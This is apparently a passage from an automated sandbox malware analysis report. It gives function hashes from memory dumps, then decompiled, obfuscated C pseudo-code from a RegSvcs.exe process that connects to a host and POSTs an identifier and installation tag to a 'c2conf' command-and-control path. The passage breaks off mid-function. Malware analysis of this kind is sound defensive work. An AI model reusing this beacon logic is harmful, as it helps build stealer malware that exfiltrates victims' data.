Instruction Fuzzy Hash: 73E0463144A388DFC75ACBB4DC60AA97BB8AF4B610F0416EEC405A72A2D7351A18CB21

Uniqueness

Uniqueness Score: -1.00%

Function 03163980 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bded832f2e31609ba7752a29e2eb437f5bd06092a25bfc1f21279a1796b11d97
Instruction ID: f9f3cf5fd765f73f178bae7dca45ecd94cb1107552ebd2aad70585908d85409f
Opcode Fuzzy Hash: bded832f2e31609ba7752a29e2eb437f5bd06092a25bfc1f21279a1796b11d97
Instruction Fuzzy Hash: 04E01A7A80A344DFCB22DBB4A9286A87BF4AB0B310F1549E7D854D3216D2350A16CB22

Uniqueness

Uniqueness Score: -1.00%

Function 03169220 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d24ea0174783c515e2866e2a597acd00ddbe0979b61854f56e41539308e6acef
Instruction ID: 3685a9fa4b00afe9a811712e27ffb47887628e219cda54e889ff2c01772005d3
Opcode Fuzzy Hash: d24ea0174783c515e2866e2a597acd00ddbe0979b61854f56e41539308e6acef
Instruction Fuzzy Hash: E5E0E574D05208EFCB54DFA8E804AADBBB8AB4C300F0081AA9819A3304D7345A61DF91

Uniqueness

Uniqueness Score: -1.00%

Function 03165071 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf446ff4e61a8d0799c2bc83ee308cd357e0325d5cf2fc2c1dee9634dcdc1b2
Instruction ID: 7bc6392ffdc2e069948ee3deacc2f8fdf3b7ce2c6bcdef0543d95abb72923196
Opcode Fuzzy Hash: aaf446ff4e61a8d0799c2bc83ee308cd357e0325d5cf2fc2c1dee9634dcdc1b2
Instruction Fuzzy Hash: 4EE0C270A0470C8FCFA18B70E408B2A7BB59F85300F44C177EC00C2555DB34C8929660

Uniqueness

Uniqueness Score: -1.00%

Function 03163990 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23318435ffcdaecec1cc347ba6a77bb5f59b84456b2d2aa8579d3af62687ddc7
Instruction ID: 1434f14d68d12be0c2f2284854adcffe661578d4a64f1a757de646a98a09eff2
Opcode Fuzzy Hash: 23318435ffcdaecec1cc347ba6a77bb5f59b84456b2d2aa8579d3af62687ddc7
Instruction Fuzzy Hash: 80D05E38806208DFCB10DFE8A928AA9B7FCE70D300F100AA59C18D3304E7310B118B92

Uniqueness

Uniqueness Score: -1.00%

Function 03164070 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a781bf2bea8e793d7cd50c54c64fe92e36d00e903e2d1f03a2da6aab353f7fb
Instruction ID: e8c8b2a96c26379210c6ec51b4e3b901f851293775914808d33e749ef431b966
Opcode Fuzzy Hash: 5a781bf2bea8e793d7cd50c54c64fe92e36d00e903e2d1f03a2da6aab353f7fb
Instruction Fuzzy Hash: 3AD05E34906208DFCB10DFE9AA186A9B7FCE70D301F110695D808D3200EB310A218B91

Uniqueness

Uniqueness Score: -1.00%

Function 03160DC0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd18189882c15aadac75942ea5723e1682cf2b72ac70cf0951833e55e170d11
Instruction ID: d8d74ef1346904d133c2b3158a764756a297449053da4e910f84ff826f849bce
Opcode Fuzzy Hash: cdd18189882c15aadac75942ea5723e1682cf2b72ac70cf0951833e55e170d11
Instruction Fuzzy Hash: 44D0123144E10CEBC714DAE4DD11EA9B77CEB0E650F40229DC918332969F716F60CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03165080 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 558a3658ba5130b7695d33d9ada07c56fbf077091513166f59d8d30318f822f9
Instruction ID: 87e0592d58a31e71aa5e19deadd8812e540eb07e4b0615b9bd79982d220126dd
Opcode Fuzzy Hash: 558a3658ba5130b7695d33d9ada07c56fbf077091513166f59d8d30318f822f9
Instruction Fuzzy Hash: 86D0123020460C9FDF209BB1E85CF1ABB999B45351F88C536EC05C2155DF39C4A1E6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0316A950 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 097c50684b2903909223e4455d9757a618c43ca8a2d5bbbf199a937254c694f7
Instruction ID: ad70721253d3ca7ca3c67edfa830b81af363b6539737ccfdbc880253e06f74f5
Opcode Fuzzy Hash: 097c50684b2903909223e4455d9757a618c43ca8a2d5bbbf199a937254c694f7
Instruction Fuzzy Hash: F2B022300022088BC230A2C8AE2C33ABAA80F82302F080080880C220A88B288220C3B2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03168880 Relevance: .5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b06182b9428c2c24aabc7196aa74e5913ff7ef1c095f02a669c6bc036001a99b
Instruction ID: 7502e14fe432e62a741a7866f87e3cda5a65bfe04682a22e71c258fe96428fc6
Opcode Fuzzy Hash: b06182b9428c2c24aabc7196aa74e5913ff7ef1c095f02a669c6bc036001a99b
Instruction Fuzzy Hash: C9F1F635B001128FCB19DFA8C89492DBBB6BF8D710B1A84ADD406DB365CB31DD52C792

Uniqueness

Uniqueness Score: -1.00%

Function 0316A970 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a61a09903e71c056619b22f14fbb759a16dfc4e00bedebaa789aa88386ad8684
Instruction ID: c45f4d3f117fd50c3cbb0dab0d602f8b0cd3961e7838c2398207c16cba2dd363
Opcode Fuzzy Hash: a61a09903e71c056619b22f14fbb759a16dfc4e00bedebaa789aa88386ad8684
Instruction Fuzzy Hash: 37513F75D012499FDB54DFB9E98069EBBF2BFD8300F19C429C005AB368EB355A06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0316A980 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.246962124.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3160000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244451112b2deab330564a2932d7d6ab0a168f7275ae51ec5b7b8d02661c3361
Instruction ID: 05339b7c7ce9e2b571b26e49d048653d3f3d2e863cf335ed38f005a5b59cd83d
Opcode Fuzzy Hash: 244451112b2deab330564a2932d7d6ab0a168f7275ae51ec5b7b8d02661c3361
Instruction Fuzzy Hash: 8D514D75E0124D9FDB54DFB9E94069EBBF6BBD8300F19C429C005AB368EB355A06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05B70006 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249178938.0000000005B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b70000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af97dd814e88e5141013b086f7a314842e24d4d6c64e9e3ef9e4452d71039b2d
Instruction ID: 946f45f8c90a314ee7e7c10ccd60a38806b42d697d81e397defad4f0c4f7e5de
Opcode Fuzzy Hash: af97dd814e88e5141013b086f7a314842e24d4d6c64e9e3ef9e4452d71039b2d
Instruction Fuzzy Hash: B6516D71D056598BDB69CF2B8C446DAFAF3AFC9300F08C1F6C45CAA265EB740A958F41

Uniqueness

Uniqueness Score: -1.00%

Function 05B7D230 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249178938.0000000005B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b70000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71b7733cdf3de083110d97a243bef3ce8a89cd1ffffee77e2c3738aa932a34d5
Instruction ID: d12b7b3face05406a3e74401e5e8257b101396b6bb29b1a32173ef2dfdcd3fa6
Opcode Fuzzy Hash: 71b7733cdf3de083110d97a243bef3ce8a89cd1ffffee77e2c3738aa932a34d5
Instruction Fuzzy Hash: 7541EFB0D0424C9FDB14CFA9D984A9DBBF1FF09350F209069E829BB254D774A885CF45

Uniqueness

Uniqueness Score: -1.00%

Function 05B70040 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249178938.0000000005B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b70000_FT0uDS8neB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6864b65e894c405c97cc45eabd217886603a66587eebce2a037e4732a91fe943
Instruction ID: 866ff3d5b6c09308b30de2d79c58e8e717403dacda32ef54a5db6afd38f05636
Opcode Fuzzy Hash: 6864b65e894c405c97cc45eabd217886603a66587eebce2a037e4732a91fe943
Instruction Fuzzy Hash: 0D512371D05A598BEB6CCF2B8D446DAFAF3AFC8304F04C1F6D41CA6264DB740A958E40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 6672, Parent PID: 6640COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	138
Total number of Limit Nodes:	1

Executed Functions

Function 0042D2D9 Relevance: 76.8, APIs: 17, Strings: 26, Instructions: 1585
networklibraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E0042D2D9() {
				void* _v16;
				intOrPtr _v20;
				unsigned int _v24;
				unsigned int _v28;
				_Unknown_base(*)()* _v32;
				DWORD* _v36;
				void* _v40;
				char _v41;
				char _v42;
				void* _v48;
				struct HINSTANCE__* _v52;
				void* _v56;
				DWORD* _v60;
				void* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				WCHAR* _v88;
				DWORD* _v92;
				long _v96;
				intOrPtr _v100;
				long _v104;
				intOrPtr _v108;
				long _v112;
				long _v116;
				long _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				long _v132;
				long _v136;
				intOrPtr _v140;
				long _v144;
				long _v148;
				long _v152;
				long _v156;
				struct HINSTANCE__* _v160;
				intOrPtr* _v164;
				_Unknown_base(*)()* _v168;
				_Unknown_base(*)()* _v172;
				_Unknown_base(*)()* _v176;
				_Unknown_base(*)()* _v180;
				char* _v184;
				int _v188;
				void* _v192;
				long _v196;
				int _v200;
				long _v204;
				intOrPtr _v208;
				long _v212;
				char _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				char _v228;
				short _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				char _v244;
				short _v270;
				char _v294;
				void* __edi;
				intOrPtr _t424;
				void* _t429;
				intOrPtr _t431;
				unsigned int _t461;
				intOrPtr _t465;
				unsigned int _t473;
				void* _t482;
				void* _t484;
				signed int _t515;
				intOrPtr _t517;
				unsigned int _t524;
				long _t533;
				DWORD* _t548;
				DWORD* _t549;
				signed int _t556;
				unsigned int _t568;
				signed int _t579;
				void* _t598;
				signed int _t637;
				signed int _t642;
				void* _t645;
				char* _t646;
				intOrPtr _t661;
				signed int _t673;
				intOrPtr _t677;
				char* _t683;
				intOrPtr _t688;
				int _t690;
				signed int _t694;
				long _t698;
				int _t699;
				signed int _t718;
				intOrPtr _t720;
				signed int _t725;
				unsigned int _t737;
				signed int _t740;
				unsigned int _t743;
				unsigned int _t745;
				unsigned int _t748;
				signed int _t751;
				unsigned int _t753;
				unsigned int _t755;
				signed int _t758;
				unsigned int _t760;
				signed int _t761;
				unsigned int _t763;
				unsigned int _t765;
				intOrPtr _t778;
				intOrPtr _t782;
				signed int _t784;
				signed int _t788;
				signed int _t790;
				unsigned int _t796;
				intOrPtr _t799;
				char _t806;
				char _t807;
				char _t808;
				unsigned int _t817;
				unsigned int _t820;
				unsigned int _t826;
				signed int _t830;
				unsigned int _t839;
				unsigned int _t843;
				unsigned int _t883;
				unsigned int _t885;
				unsigned int _t888;
				unsigned int _t890;
				signed int _t891;
				signed int _t892;
				char* _t894;
				DWORD* _t895;
				CHAR* _t901;
				CHAR* _t902;
				CHAR* _t903;
				CHAR* _t904;
				CHAR* _t905;
				WCHAR* _t906;
				void* _t907;

				_v20 = 0xa278f3a9;
				while(1) {
					_t424 = _v20;
					if(_t424 <= 0xfb4ef30b) {
						goto L11;
					}
					L2:
					if(_t424 <= 0x3e54401f) {
						if(_t424 > 0x1d382c87) {
							if(_t424 > 0x2a00a189) {
								if(_t424 > 0x323dd096) {
									if(_t424 > 0x374609b8) {
										if(_t424 == 0x374609b9) {
											E004338A0( &_v270, L"kernel32.dll", 0x1a);
											_t895 =  &(_t895[3]);
											_v20 = 0x7ad6c1a2;
										} else {
											if(_t424 == 0x3da30a9b) {
												E004338A0(_v80, "HttpSendRequestA", 0x11);
												_t895 =  &(_t895[3]);
												_v20 = 0x6dcd08ed;
											}
										}
									} else {
										if(_t424 == 0x323dd097) {
											_v20 = 0x8ba133cb;
										} else {
											if(_t424 == 0x33020bbf) {
												_v188 = InternetQueryDataAvailable(_v40, _v36, 0, 0);
												_v20 = 0xb2ba095e;
											}
										}
									}
									while(1) {
										_t424 = _v20;
										if(_t424 <= 0xfb4ef30b) {
											goto L11;
										}
										goto L2;
									}
								}
								if(_t424 > 0x2e3fa769) {
									if(_t424 == 0x2e3fa76a) {
										 *_v32(_v56);
										L357:
										_v20 = 0x6ad3e905;
										_v96 = 0;
										while(1) {
											_t424 = _v20;
											if(_t424 <= 0xfb4ef30b) {
												goto L11;
											}
											goto L2;
										}
										goto L11;
									}
									if(_t424 != 0x30f3330a) {
										continue;
									}
									_t743 = (_v24 << 5) + 0xfffffb00;
									_v24 = _t743;
									E00405CD8();
									E0042D2D9();
									_t431 = 0x1ebe10ae;
									if(_t743 >= 0xb9) {
										_t431 = 0xd8ace256;
									}
									L370:
									_v20 = _t431;
									continue;
								}
								if(_t424 == 0x2a00a18a) {
									_t745 = 0x2cc04 + _v24 * 0xa280;
									_v24 = _t745;
									E0042CC81(_t745);
									_t895 =  &(_t895[1]);
									E00405CD8();
									_t431 = 0xc9dd24ae;
									if(_t745 >= 0x53) {
										_t431 = 0xa278f3a9;
									}
									goto L370;
								} else {
									if(_t424 == 0x2a071572) {
										_v216 = 0;
										_v220 = 0x57797261;
										_v224 = 0x7262694c;
										_v228 = 0x64616f4c;
										_v20 = 0x8fec2d08;
									}
									continue;
								}
							}
							if(_t424 > 0x20450f8c) {
								if(_t424 > 0x28a42e15) {
									if(_t424 == 0x28a42e16) {
										_t598 = InternetConnectA(_v56, _v184, 0x50, 0, 0, 3, 0, 0); // executed
										_v64 = _t598;
										_t431 = 0x637a2d94;
										if(_v64 != 0) {
											_t431 = 0xf17d0de4;
										}
										goto L370;
									}
									if(_t424 != 0x29fd9ac8) {
										continue;
									}
									_v24 = (_v24 << 0x00000009 & 0x3ffffe00) * 0xd5;
									E00405CD8();
									L259:
									_v20 = 0x9c31a222;
									continue;
								}
								if(_t424 == 0x20450f8d) {
									InternetCloseHandle(_v40); // executed
									 *_v32(_v64);
									_v20 = 0xf8c2d8e3;
									continue;
								}
								if(_t424 != 0x22430df1) {
									continue;
								} else {
									_v144 =  *_v36;
									_t431 = 0xb1c14801;
									if(_v144 == 0) {
										_t431 = 0x3f8e1df7;
									}
									if(_v41 == 0) {
										_t431 = 0x3f8e1df7;
									}
									goto L370;
								}
							}
							if(_t424 > 0x1f81ca68) {
								if(_t424 == 0x1f81ca69) {
									_t748 = (_v24 << 7) + 0xffffffcf;
									_v24 = _t748;
									E0042D2D9();
									E0042CC81(_t748);
									_t895 =  &(_t895[1]);
									_t431 = 0x75badd0d;
									if(_t748 < 0xe) {
										_t431 = 0x9c31a222;
									}
									goto L370;
								}
								if(_t424 == 0x201c8a4f) {
									_v212 = _v120;
									_v108 = _v124;
									_v20 = 0xd3f69e99;
								}
								continue;
							}
							if(_t424 == 0x1d382c88) {
								_v24 = (_v24 + 0x6f >> 0x11) + 0x191;
								E0042C500(0x1121, (_v24 + 0x6f >> 0x11) + 0x191);
								_t895 =  &(_t895[2]);
								E0042D2D9();
								_v20 = 0xa69bcb1f;
								continue;
							}
							if(_t424 != 0x1ebe10ae) {
								continue;
							} else {
								_t890 = 0x58 + _v24 * 0xe3;
								_v24 = _t890;
								E0042CC81(_t890);
								_t895 =  &(_t895[1]);
								E0042D2D9();
								_t431 = 0x5d332b45;
								if(_t890 != 0x89) {
									_t431 = 0xf51b34be;
								}
								goto L370;
							}
						}
						if(_t424 > 0xd4731c7) {
							if(_t424 > 0x15e709b7) {
								if(_t424 > 0x1a4e9759) {
									if(_t424 == 0x1a4e975a) {
										_v28 = ((_v28 << 6) + 0x12d7 >> 1) * 0x74;
										_v20 = 0x5c91cd5d;
									} else {
										if(_t424 == 0x1b7e23f8) {
											_v20 = 0x472552b;
										}
									}
									continue;
								}
								if(_t424 == 0x15e709b8) {
									goto L259;
								} else {
									if(_t424 == 0x18eaad37) {
										E004343A0(0, _v48, 0, 0x400);
										_t895 =  &(_t895[3]);
										_v20 = 0xbba1eda2;
									}
									continue;
								}
							}
							if(_t424 > 0xeccad33) {
								if(_t424 == 0xeccad34) {
									_v28 = _v28 * 0x17d000 >> 0xf;
									_v20 = 0x3fbd82f9;
									continue;
								}
								if(_t424 != 0xfc3115d) {
									continue;
								}
								_t751 = _v24 << 0x00000002 & 0x00fffff0;
								_v24 = _t751;
								E00405CD8();
								E00405CD8();
								_t431 = 0x20450f8d;
								if(_t751 < 0xe4) {
									_t431 = 0x2a071572;
								}
								goto L370;
							} else {
								if(_t424 == 0xd4731c8) {
									_v20 = 0x323dd097;
								} else {
									if(_t424 == 0xebea009) {
										_v20 = 0x3da30a9b;
									}
								}
								continue;
							}
						}
						if(_t424 > 0x16f14fa) {
							if(_t424 > 0x472552a) {
								if(_t424 == 0x472552b) {
									E004338A0(_v92, "lid=%s&j=%s&ver=4.0", 0x14);
									_t895 =  &(_t895[3]);
									_v20 = 0xa074f80d;
									continue;
								}
								if(_t424 != 0xbb9baa2) {
									continue;
								}
								_t891 = _v24 * 0x700;
								_v24 = _t891;
								E0042CC81(_t891);
								_t895 =  &(_t895[1]);
								_t431 = 0xce77b803;
								if(_t891 != 0) {
									_t431 = 0xc222e75c;
								}
								goto L370;
							}
							if(_t424 == 0x16f14fb) {
								_t637 = _v28 + 0xffffffad;
								_v28 = 0xffffff59 + _t637 * 0x1b4;
								_t778 = 0x9c31a222;
								if(_t637 * _t637 != _t637 * _t637 * 0x85f7 - 1) {
									_t778 = 0x807bf9f2;
								}
								L315:
								_v20 = _t778;
							} else {
								if(_t424 == 0x38cfea8) {
									InternetReadFile(_v40, _v192, _v156, _v60);
									_v20 = 0xa5fd90c0;
								}
							}
							continue;
						}
						if(_t424 > 0xa9af0c) {
							if(_t424 == 0xa9af0d) {
								_v20 = 0x6ad3e905;
								_v96 = _v112;
								continue;
							}
							if(_t424 != 0x12b6d71) {
								continue;
							}
							_t642 = _v28 + 0xffffffe9;
							_v28 = _t642 << 8;
							_t431 = 0xfe9e6b54;
							if(_t642 * _t642 * 0x17cd - 1 != _t642 * _t642) {
								_t431 = 0x38cfea8;
							}
							goto L370;
						}
						if(_t424 == 0xfb4ef30c) {
							_t645 = HttpOpenRequestW(_v64, L"POST", _v88, 0, 0, 0, 0, 0); // executed
							_v40 = _t645;
							_t431 = 0xfa84a7ce;
							if(_v40 != 0) {
								_t431 = 0xd9c9c091;
							}
							goto L370;
						} else {
							if(_t424 == 0xfe9e6b54) {
								_t646 = _v88;
								_t646[0xc] =  *0x457b88 & 0x0000ffff;
								_t806 =  *0x457b84; // 0x66006e
								_t646[8] = _t806;
								_t807 = L"conf"; // 0x6f0063
								_t646[4] = _t807;
								_t808 = L"c2conf"; // 0x320063
								 *_t646 = _t808;
								_v20 = 0x5eb4f9fa;
							}
							continue;
						}
					}
					if(_t424 <= 0x5fe7c5af) {
						if(_t424 > 0x592b6a8b) {
							if(_t424 > 0x5d4ae4e0) {
								if(_t424 > 0x5f837595) {
									if(_t424 == 0x5f837596) {
										_v28 = (_v28 * 0x146 >> 0xe) + 0x6f;
										_v20 = 0x8342755e;
									} else {
										if(_t424 == 0x5f8a49cf) {
											_v28 = ((_v28 << 5) + 0xe2 >> 6) * 0x72 >> 0xa;
											_v20 = 0x46367d57;
										}
									}
									continue;
								}
								if(_t424 == 0x5d4ae4e1) {
									_t788 = (_v24 >> 0xe) * 0xd6;
									_v24 = _t788;
									_t431 = 0x607634f4;
									if(_t788 < 0x68) {
										goto L370;
									}
									L329:
									_t431 = 0x75badd0d;
									goto L370;
								}
								if(_t424 != 0x5eb4f9fa) {
									continue;
								} else {
									_t790 = _v28 + 0xffffff0a;
									_v28 = _t790 >> 0xd;
									_t431 = 0xd255b3a8;
									if(_t790 * _t790 != _t790 * _t790 * 0x1fb9 - 1) {
										_t431 = 0x9409d7b6;
									}
									goto L370;
								}
							}
							if(_t424 > 0x5c91cd5c) {
								if(_t424 == 0x5c91cd5d) {
									_push(0xa);
									_t661 = E0043F9A4();
									_t895 =  &(_t895[1]);
									_v140 = _t661;
									_v20 = 0x9ca64f4e;
									continue;
								}
								if(_t424 != 0x5d332b45) {
									continue;
								}
								_t737 = ((_v24 << 0x00000005) + (_v24 << 0x00000005) * 0x00000002 >> 0x00000002 & 0xffffffe0) + 0xffffff4c;
								_v24 = _t737;
								E0042D2D9();
								E0042CC81(_t737);
								_t895 =  &(_t895[1]);
								_t431 = 0xbd00218a;
								if(_t737 < 0x71) {
									goto L370;
								}
								L223:
								_t431 = 0x374609b9;
								goto L370;
							}
							if(_t424 == 0x592b6a8c) {
								 *((char*)(_v108 + _v212)) = 0;
								_v20 = 0xba0b3285;
								continue;
							}
							if(_t424 != 0x5c51fc7e) {
								continue;
							} else {
								_v28 = 0xffffff9c + _v28 * 0x00000054 >> 0x00000004 & 0xffffffc0;
								goto L357;
							}
						}
						if(_t424 > 0x46367d56) {
							if(_t424 > 0x4aa878f0) {
								if(_t424 == 0x4aa878f1) {
									_t740 = _v24 << 0x0000000c | 0x000000f8;
									_v24 = _t740;
									_push(_t740);
									_push(0x508a);
									_push(0x5c9a);
									E0041F840(_t424);
									_t895 =  &(_t895[3]);
									_t431 = 0xac5c7333;
									if(_t740 < 0xf) {
										_t431 = 0xccb77d4c;
									}
									goto L370;
								}
								if(_t424 != 0x4b1c6c50) {
									continue;
								}
								_t673 = _v28;
								_v28 = 0x9e1f + _t673 * 0x83;
								_t431 = 0x75badd0d;
								if((_t673 + 0x5c) * (_t673 + 0x5c) * 0x4f4f - 1 != (_t673 + 0x5c) * (_t673 + 0x5c)) {
									_t431 = 0xc9dd24ae;
								}
								goto L370;
							} else {
								if(_t424 == 0x46367d57) {
									 *_v60 = 0;
									_v20 = 0x8ac696a0;
								} else {
									if(_t424 == 0x47940086) {
										_t677 = 0x64f01d14;
										if(_v152 == 0) {
											_t677 = 0x201c8a4f;
										}
										if(_v42 == 0) {
											_t677 = 0x201c8a4f;
										}
										_v20 = _t677;
										_v124 = _v100;
										_v120 = _v148;
									}
								}
								continue;
							}
						} else {
							if(_t424 > 0x3f8e1df6) {
								if(_t424 == 0x3f8e1df7) {
									_t796 = _v28;
									_v28 = (_t796 >> 0x14) + 0xeb;
									_t799 = 0x8ba133cb;
									if((_t796 >> 0xb) * (_t796 >> 0xb) * 0x743 - 1 != (_t796 >> 0xb) * (_t796 >> 0xb)) {
										_t799 = 0x201c8a4f;
									}
									_v20 = _t799;
									_v124 = _v140;
									_v120 = 0;
								} else {
									if(_t424 == 0x3fbd82f9) {
										_t683 =  *0x460084; // 0x460061
										_v184 = _t683;
										_v20 = 0x28a42e16;
									}
								}
							} else {
								if(_t424 == 0x3e544020) {
									_v20 = 0x2a071572;
								} else {
									if(_t424 == 0x3e71f9d2) {
										_v20 = 0xa50e5436;
									}
								}
							}
							continue;
						}
					}
					if(_t424 > 0x6d2e668c) {
						if(_t424 > 0x7ad6c1a1) {
							if(_t424 > 0x7cc50aa9) {
								if(_t424 == 0x7cc50aaa) {
									_push(_v104 + _v156 + 1);
									_push(_v208);
									_t688 = E0043FD01();
									_t895 =  &(_t895[2]);
									_v100 = _t688;
									_v20 = 0x5f8a49cf;
								} else {
									if(_t424 == 0x7f784f0e) {
										_t690 = InternetQueryDataAvailable(_v40, _v36, 0, 0); // executed
										_v200 = _t690;
										_v20 = 0x5f837596;
									}
								}
								continue;
							}
							if(_t424 == 0x7ad6c1a2) {
								_t694 = 0x225 + (_v28 >> 3) * 0xb7;
								_v28 = _t694 << 0x0000001a | 0x0000003b;
								_t782 = 0xa278f3a9;
								if(_t694 * _t694 != _t694 * _t694 * 0x39f7 - 1) {
									_t782 = 0xc9b0b0db;
								}
								L323:
								_v20 = _t782;
							} else {
								if(_t424 == 0x7c305ddd) {
									_v20 = 0x18eaad37;
								}
							}
							continue;
						}
						if(_t424 > 0x75badd0c) {
							if(_t424 == 0x75badd0d) {
								_v172 = GetProcAddress(_v52, _v68);
								_v20 = 0xe5de47a9;
								continue;
							}
							if(_t424 != 0x77bf5f57) {
								continue;
							}
							_push("default");
							E0041F840(_t424, _v48, 0x3ff, _v92, "Z2wKCn--installs2p");
							_t698 = E00440010(_v48);
							_t895 =  &(_t895[6]);
							_t699 = HttpSendRequestA(_v40, "Content-Type: application/x-www-form-urlencoded", 0x2f, _v48, _t698); // executed
							_t778 = 0xf048c21d;
							if(_t699 != 0) {
								_t778 = 0x1a4e975a;
							}
							goto L315;
						}
						if(_t424 == 0x6d2e668d) {
							_t888 = (_v24 << 0xd) + 0xc20a5;
							_v24 = _t888;
							E0042C500(0x3b58, _t888);
							_t895 =  &(_t895[2]);
							_t431 = 0xfacfb899;
							if(_t888 < 0xd7) {
								_t431 = 0x5c91cd5d;
							}
							goto L370;
						}
						if(_t424 != 0x6dcd08ed) {
							continue;
						} else {
							_t784 = _v28;
							_v28 = 0xf5926000 + _t784 * 0x71000 >> 0xd;
							_t782 = 0xc9b0b0db;
							if((_t784 - 0xe2) * (_t784 - 0xe2) != (_t784 - 0xe2) * (_t784 - 0xe2) * 0x503b - 1) {
								_t782 = 0x81c33858;
							}
							goto L323;
						}
					}
					if(_t424 <= 0x64f01d13) {
						if(_t424 > 0x6310c7a9) {
							if(_t424 == 0x6310c7aa) {
								_v28 = 0x82436 + _v28 * 0xf00;
								_v20 = 0xf92e82de;
							} else {
								if(_t424 == 0x637a2d94) {
									_v28 = (0xffffff61 + _v28 * 0x000000ec >> 0x00000002 & 0xfffffffe) + (0xffffff61 + _v28 * 0x000000ec >> 0x00000002 & 0xfffffffe) * 8;
									_v20 = 0x2e3fa76a;
								}
							}
							continue;
						}
						if(_t424 == 0x5fe7c5b0) {
							_t885 = 0xffffffd4 + _v24 * 0x75;
							_v24 = _t885;
							E00405CD8();
							E0042CC81(_t885);
